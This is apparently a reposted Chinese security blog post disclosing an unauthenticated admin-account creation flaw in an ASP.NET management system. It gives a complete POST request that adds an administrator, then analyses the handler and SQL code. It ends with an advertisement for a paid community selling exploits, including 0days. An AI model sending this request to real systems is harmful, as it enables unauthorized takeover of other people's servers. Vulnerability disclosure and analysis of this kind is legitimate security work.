当前位置: 首页 > news >正文

asp网站如何建设dedecms网站入侵

asp网站如何建设,dedecms网站入侵,赣州市微语网络科技有限公司,微信小程序怎么做?01阅读须知 此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失&#xf…

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02漏洞背景

图片

03漏洞复现

近日外部公开渠道爆出该系统的System**.as**接口存在敏感信息泄露漏洞,可导致攻击者添加后台管理员账户和密码。具体的数据包如下所示。

POST /System**.as** HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/top.html
Connection: close
Cookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fb
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 175operator**=test&operator**=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=ad**

上述请求构造的POST请求,包含了新增账户和两次确认的密码,发送请求后在页面返回显示1,表示成功添加管理员账户。

04漏洞分析

存在漏洞的是一个Handler,经过分析得知代码隐藏在New**.System**类名中,首先从HTTP请求的表单数据中获取operatorName、operatorPwd、operatorRole等参数。

string operatorName = context.Request.Form["operatorName"];
string operatorPwd = context.Request.Form["operatorPwd"];
string operatorRole = context.Request.Form["operatorRole"];
string visible_jh = context.Request.Form["visible_jh"];

随后,下面代码调用了SystemMngBLL类中的addOperators方法,并传入提取的表单数据作为参数。该方法返回一个整数,该整数被转换为字符串并存储在rtnStr中。

rtnStr = SystemMngBLL.addOperators(operatorName, operatorPwd, operatorRole, visible_jh).ToString();

接着,下面业务逻辑层 (BLL) 中的方法,调用了同名的数据访问层 (DAL) 方法,实际上是一个传递操作。与数据库交互的实际工作由DAL负责。

public static int addOperators(string operatorName, string operatorPwd, string operatorRole, string visible_jh)
{return SystemMngDAL.addOperators(operatorName, operatorPwd, operatorRole, visible_jh);
}

然后,该方法构建了一个SQL命令,如果数据库中不存在相同用户名的操作员,则将其插入数据库。

public static int addOperators(string operatorName, string operatorPwd, string operatorRole, string visible_jh)
{string sqlStr = "if not exists(select * from qx where username=@username)\r\n                                insert qx(username, password, qx, memo, people_node,visible_jh) values(@username,@password, '1111111111111111111111111', '', @people_node,@visible_jh)";SqlParameter[] p = new SqlParameter[]{new SqlParameter("@username", operatorName),new SqlParameter("@password", operatorPwd),new SqlParameter("@visible_jh", visible_jh),new SqlParameter("@people_node", operatorRole)};return SqlHelper.ExecuteNonQuery(SqlHelper.dbCon, CommandType.Text, sqlStr, p);
}

插入一个新记录,包含提供的username、password、固定的qx值(可能代表权限)、空的memo、people_node(角色)和visible_jh(可见性)。

星球持续更新最新的 .NET 应用漏洞POC,并在每年HW期间提供一手漏洞情报。这些POC/EXP涵盖了一些0day和1day漏洞,确保您始终掌握最前沿的安全信息和防护措施。

图片

 05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

http://www.yayakq.cn/news/352035/

相关文章:

  • 关于推进网站集约化建设的讲话.net core 做网站
  • 湖南省建设信息网站中国工业机械加工网
  • 视觉营销网站如何去除wordpress登录页面图标
  • 灰色系网站免费学生网页制作成品
  • 男女做暖暖试看网站wordpress 安装 服务器 系统
  • 网站建设的ppt现在学什么行业和技术前景好
  • 南昌二手网站开发方案天津做网站网页的公司
  • 织梦可以做视频网站么全自动网页制作系统源码
  • 网站建设马鞍山青岛市城乡和住房建设局
  • 济南优化网站价格工作细胞第一季免费观看
  • 网页设计汽车网站建设网站建设捌金手指花总二八
  • 政务信息系统网站建设规范网站制作公司怎么找
  • 山东一建建设有限公司官方网站广州电商运营培训哪个机构好
  • 互联网站安全管理服务平台青岛金桥建设机械有限公司网站
  • 自己做刷东西的网站网络设计原则有哪些
  • 宁波公司建网站哪家建设部执业资格网站
  • 常德网站定制wordpress youku videos
  • 简单的手机网站模板下载怎么做可以直播的网站吗
  • 杭州城乡建设厅网站论坛网站模块
  • 上海专业做网站的公司分销商城网站开发
  • 什么专业的会做网站包装设计作品
  • 网络下载的网站模板能直接上传到虚拟主机google国外入口
  • 企业电商网站商城建设网站关键词修改
  • 淘宝做链接有哪些网站可以做开网店卖什么产品比较好
  • 手机qq查看网站源码wordpress添加语系
  • 哪个网站有手机wordpress更改忘记密码样式
  • 妇幼保健院人流价格表seo技术培训价格表
  • php网站建设填空题内蒙古城乡和住房建设厅网站
  • 爱有声小说网站捡个校花做老婆网站建设策划内容
  • 网站后台统计代码wordpress 禁止更新提示